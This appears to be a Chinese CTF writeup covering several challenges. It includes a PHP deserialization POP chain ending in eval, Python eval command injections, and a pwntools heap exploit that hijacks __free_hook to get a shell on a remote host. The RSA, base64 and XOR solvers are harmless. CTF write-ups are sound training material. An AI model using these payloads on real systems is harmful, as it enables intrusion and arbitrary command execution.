WEB 题目二名称:EzPop
利用 a::__destruct 作为链头,在反序列化时触发,然后触发 b::__toString,再调用 c::__call,利用 call_user_func_array 去调用 evil 类中的 eval 实现 getshell。
具体payload
<?php
// Payload generator for the EzPop chain. The classes below carry only the
// state the target's gadget classes need: the target's own methods that drive
// the chain at unserialize() time (a::__destruct per the writeup above, and
// c::callExtension, which is not shown on this page) are left out because
// serialize() records state only. Declared visibility and property order must
// match the target exactly, since serialize() encodes them (private as
// "\0a\0_path", protected as "\0*\0config") and a mismatch silently breaks
// the chain.

class evil {
    // Sink of the chain. The second class_exists() argument disables
    // autoloading, so an unknown class name falls through to eval(); the
    // leading "?>" leaves PHP mode first, which is why the code string built
    // in $b below starts with "<?=". getClassName()/getCode() are presumably
    // accessors of the target's real class e; they are never called here.
    // The defensive fix is to never let eval() consume data that arrived
    // through unserialize().
    public function load(e $definition) {
        if (class_exists($definition->getClassName(), false)) {
            return;
        }
        eval("?>" . $definition->getCode());
    }
}

class e {
    // Data carrier handed to evil::load(); $code is the string eval() runs.
    protected $config;
    protected $code;
    public function __construct($config, $code) {
        $this->config = $config;
        $this->code = $code;
    }
}

class d {
    // Catch-all gadget: every property read and every undefined method call
    // resolves to $default, whatever object it holds.
    protected $default;
    public function __construct($default) {
        $this->default = $default;
    }
    public function __get($attribute) {
        return $this->default;
    }
    public function __call($method, $attributes) {
        return $this->default;
    }
}

class a {
    // Chain entry. Both $_keys (inside an array) and $_path hold the same $b;
    // per the writeup the target's a::__destruct (not shown here) is where the
    // string conversion of $b starts.
    const POSITION_START = 0;
    const POSITION_END = 1;
    const POSITION_CURRENT = 2;
    private $_path = 123;
    private $_keys = array();
    public function __construct($_keys, $_path) {
        $this->_keys = $_keys;
        $this->_path = $_path;
    }
}

class b {
    private $name;
    private $value;
    private $util;
    public function __construct($util, $value) {
        $this->name = "123";
        $this->util = $util;
        $this->value = $value;
    }
    // Calls stringify() on $util, a c instance; c defines no such method, so
    // the call lands in c::__call with $value (the e object) as its argument.
    public function __toString() {
        echo "tostring";
        return sprintf('state(%s(), %s)', $this->name, $this->util->stringify($this->value));
    }
}

class c {
    protected $container;
    protected $extensions = [];
    public function __construct($container, $extensions) {
        $this->container = $container;
        $this->extensions = $extensions;
    }
    // substr("stringify", 8) is "y"; Str::snake is assumed to leave that
    // unchanged, so the "y" => "load@load" entry set below satisfies isset()
    // and callExtension() runs. callExtension is not on this page; per the
    // writeup it reaches evil::load() through call_user_func_array — confirm
    // against the target source. Neither Str nor callExtension is needed to
    // produce the serialized string, which is why this script can omit them.
    public function __call($method, $parameters) {
        $rule = Str::snake(substr($method, 8));
        if (isset($this->extensions[$rule])) {
            return $this->callExtension($rule, $parameters);
        }
        throw new BadMethodCallException("Method [$method ] does not exist.");
    }
}

// Build the object graph and emit it url-encoded for the `data` parameter.
// $b appears twice inside $a, so serialize() writes the second occurrence as
// a back-reference (the "r:2;" visible in the payload that follows).
$b = new b(new c(new d(new evil()), array("y" => "load@load")), new e(new d("123"), "<?=`cat /flag`;"));
$a = new a(array($b), $b);
echo urlencode((serialize($a)));
data=O%3A1%3A%22a%22%3A2%3A%7Bs%3A8%3A%22%00a%00\_path%22%3BO%3A1%3A%22b%22%3A3%3A%7Bs%3A7%3A%22%00b%00name%22%3Bs%3A3%3A%22123%22%3Bs%3A8%3A%22%00b%00value%22%3BO%3A1%3A%22e%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00config%22%3BO%3A1%3A%22d%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A3%3A%22123%22%3B%7Ds%3A7%3A%22%00%2A%00code%22%3Bs%3A15%3A%22%3C%3F%3D%60cat+%2Fflag%60%3B%22%3B%7Ds%3A7%3A%22%00b%00util%22%3BO%3A1%3A%22c%22%3A2%3A%7Bs%3A12%3A%22%00%2A%00container%22%3BO%3A1%3A%22d%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3BO%3A4%3A%22evil%22%3A0%3A%7B%7D%7Ds%3A13%3A%22%00%2A%00extensions%22%3Ba%3A1%3A%7Bs%3A1%3A%22y%22%3Bs%3A9%3A%22load%40load%22%3B%7D%7D%7Ds%3A8%3A%22%00a%00\_keys%22%3Ba%3A1%3A%7Bi%3A0%3Br%3A2%3B%7D%7D
题目三名称:超级马里奥 右键查看源码,审计 init.js 代码,发现存在路径 /u_found_me_haha,直接请求该路径即可获取 flag。
flag{43418584324789516099149302113911}
MISC 题目一名称:calc 下载源码直接审计,发现代码比较简单,且有远程运行环境
nc 访问直接输入key 获取key值
0317dcd25f8916b43998be722434ed14
调用方法2 直接带入key触发eval函数,构造payload如下:
# Two alternative payload lines (the page shows one per listing line). Each is a
# single Python expression that the calc service hands to eval() after the key is
# supplied, as described above; the root defect is evaluating caller input at
# all, so a server-side fix removes eval() rather than filtering these strings.
__import__('os').system('ls /')
__import__('os').system('cat /flag')
题目二名称:eye
flag{b9bb5b2db051d713e307b2b8b98050ae}
思路:用 foremost 对图片进行提取,得到加密压缩包 -> 对压缩包爆破 CRC32 -> base64 解密 -> silent eye
压缩包密码:ohhhh_you_found_me
解压缩之后得到 key.txt,对里面的字符进行 base64 解密,得到 silent eye 的 key。
Silenteye key:c31d1f23ecec64ac28cc1036066fa1
CRYPTO 题目二名称:babysm1 flag{12541f1c51c9228ca824ecf1f5def14a}
思路:RSA低指数攻击e = 3
# Public exponent, ciphertext and modulus as given by the challenge.
e = 3
c = 2217344750798236287989923271111493621814821232365781784992845921175835939916080255971267802993897386183080504406849487970548937348304569582798336704291413362485808165972480022302292463614365892149324677003706817975871653875892621395157463049066727487824595070529224326645861
n = 63916398739042244969298556913752866927345103091746531832160172776924327621386275688870376773848098753349049481579609776026424552613871689909239611712050170593399119845564628346168861169308355368322234316835673432583400422883895605822047092249278927145442473528410586074407793529865400676962006885370537237931
# Functions_Eurynome is the author's helper library and is not on this page;
# RSA_Low_Exponent_e3 presumably recovers m from c for e = 3 (small-message /
# cube-root case), and long_to_bytes is assumed to come from the same star
# import — confirm against that module before relying on either.
from Functions_Eurynome import *
m = RSA_Low_Exponent_e3(c, e, n)
print(m)
print(long_to_bytes(m).decode())
flag{12541f1c51c9228ca824ecf1f5def14a}
REVERSE 题目一名称:MagicBase 魔改base64
变表+最终结果+1
Dword_53F000运行时值为1
变表:”gBiDkFmHoJqLsNuPwRyT0V2X4Z6b8d+fAhCjElGnIpKrMtOvQxSzU1W3Y5a7c9e/“
对比数据:”v1t4t{x6tltut{CltT2nOEilMUhVS11ut{inOkGlOUOjO11ZOR@#”
解题思路:对比数据-1,使用新表解码获取flag
Flag: 9C73490C-30D3-F48D-04EE-38F61D53B5E87
代码内容:
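import base64
import string

# Comparison data pulled from the binary. Per the writeup above, the program adds
# 1 to every character of its custom base64 output (Dword_53F000 is 1 at run
# time), so each character is shifted back by 1 before the alphabet is undone.
enc = "v1t4t{x6tltut{CltT2nOEilMUhVS11ut{inOkGlOUOjO11ZOR@#"

# Shuffled alphabet used by the binary, positionally aligned with the standard
# base64 alphabet so a character translation maps one onto the other.
new_table = "gBiDkFmHoJqLsNuPwRyT0V2X4Z6b8d+fAhCjElGnIpKrMtOvQxSzU1W3Y5a7c9e/"
old_table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def shift_back(text, delta=1):
    """Return ``text`` with every code point decreased by ``delta``.

    Parameters:
        text:  the string to shift.
        delta: amount subtracted from each code point (default 1).
    """
    return "".join(chr(ord(ch) - delta) for ch in text)


def decode_magic_base64(data, table=new_table):
    """Decode ``data`` written in the shuffled alphabet ``table`` as base64.

    Returns the decoded bytes. Raises ``binascii.Error`` (from
    ``base64.b64decode``) when ``data`` is not valid base64 after translation.
    """
    return base64.b64decode(data.translate(str.maketrans(table, old_table)))


dedata = shift_back(enc)
print(dedata)
# The last two characters of `enc` ("@#") shift to '?"' rather than the "=="
# padding a decoder expects, so the shifted string is replaced by the hand
# corrected copy below before decoding. (The original listing had one closing
# parenthesis too many on the decode line, which made it a syntax error.)
dedata = "u0s3szw5skstszBksS1mNDhkLTgUR00tszhmNjFkNTNiN00YNQ=="
print(decode_magic_base64(dedata))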
题目二名称:EzXorCpp C++编写的程序
通过调试可大概了解程序验证流程为:input->倒序->xor 0x70
对比的数据
解题思路:
Enc -> xor 0x70 ->倒序即可获得正确输入
Flag: acd66d8fb8b7b7bd55327a92ef39a9d2
代码内容:
# Comparison bytes embedded in the binary. Per the writeup above the program
# reverses the input and XORs each byte with 0x70 before comparing, so undoing
# the XOR and then reversing recovers the expected input.
data = [
    0x42, 0x14, 0x49, 0x11, 0x49, 0x43, 0x16, 0x15,
    0x42, 0x49, 0x11, 0x47, 0x42, 0x43, 0x45, 0x45,
    0x14, 0x12, 0x47, 0x12, 0x47, 0x12, 0x48, 0x12,
    0x16, 0x48, 0x14, 0x46, 0x46, 0x14, 0x13, 0x11,
]

# XOR is its own inverse, so one pass with the same key removes it.
flag = "".join(chr(byte ^ 0x70) for byte in data)

print(flag)        # still reversed
print(flag[::-1])  # the accepted input
PWN 题目一名称:bookos 分析程序保护全开
用 IDA 分析程序,漏洞点在于 delete、edit 和 show 时对 index 没有检查,造成越界访问。
这里以edit为例
调试寻找heap附近可用链
发现-7处指向的地方有libc相关地址,于是打印-7泄露libc
进而利用-9处地址修改-26处为free_hook,再利用-26处的free_hook劫持free_hook到system
释放写着/bin/sh的堆块达成利用
Exp
from pwn import *
context.log_level = 'debug'
elf = ELF('./pwn')
libc = ELF('./libc.so.6')

# The helpers below drive the target's text menu over the socket `p`, which is
# assigned at module level before any of them is called. Each one reads up to
# the prompt it expects and answers it; none of them checks the reply.


def my():
    # Initial registration dialogue (name / password / email / location).
    # The values are arbitrary filler.
    p.recvuntil('name\n')
    p.sendline('aaa')
    p.recvuntil('password\n')
    p.sendline('111')
    p.recvuntil('email\n')
    p.sendline('abc')
    p.recvuntil('do u wanna complete your messages?\n')
    p.sendline('Y')
    p.recvuntil('location\n')
    p.sendline('abcd')


def add():
    # Menu option 1: create a new entry.
    p.recvuntil('show\n')
    p.sendline('1')


def edit(idx, desc):
    # Menu option 2: overwrite entry `idx` with `desc`. Per the analysis above
    # the binary does not range-check idx, so negative values address memory
    # before the entry table; a server-side bounds check on idx closes this.
    p.recvuntil('show\n')
    p.sendline('2')
    p.recvuntil('index:\n')
    p.sendline(str(idx))
    p.recvuntil('content:\n')
    p.sendline(desc)


def edit2(idx, desc):
    # Same as edit() but without waiting for the 'show' menu line first —
    # presumably because the preceding show() left the menu unread; confirm.
    p.sendline('2')
    p.recvuntil('index:\n')
    p.sendline(str(idx))
    p.recvuntil('content:\n')
    p.sendline(desc)


def delete(idx):
    # Menu option 3: free entry `idx` (same unchecked index as edit()).
    p.recvuntil('show\n')
    p.sendline('3')
    p.recvuntil('index:\n')
    p.sendline(str(idx))


def show(idx):
    # Menu option 4: print entry `idx` (same unchecked index as edit()).
    p.recvuntil('show\n')
    p.sendline('4')
    p.recvuntil('index:\n')
    p.sendline(str(idx))


p = remote('1.14.97.218', 21434)
my()
add()
payload = '/bin/sh\x00'
edit(0, payload)

# Out-of-bounds read: per the writeup, slot -7 holds a libc-related pointer.
# Only 6 bytes of it are significant, hence the zero padding to 8 before u64.
# The two constants rebase the leaked pointer to the libc load address and are
# specific to the provided libc.so.6 build.
show(-7)
data = p.recv()[:6].ljust(8, '\x00')
libc_base = u64(data) - 0xD27960 + 0x39E000
free_hook = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.symbols['system']
log.success('libc_base:' + hex(libc_base))
log.success('free_hook:' + hex(free_hook))
log.success('system_addr:' + hex(system_addr))

# Out-of-bounds writes, as described in the writeup: editing slot -9 rewrites
# what slot -26 points to so that it now names __free_hook, and editing slot
# -26 then stores system's address there. Freeing entry 0 ("/bin/sh") invokes
# the hook. The same missing index check enables both writes.
payload = p64(free_hook)
edit2(-9, payload)
edit(-26, p64(system_addr))
delete(0)
p.interactive()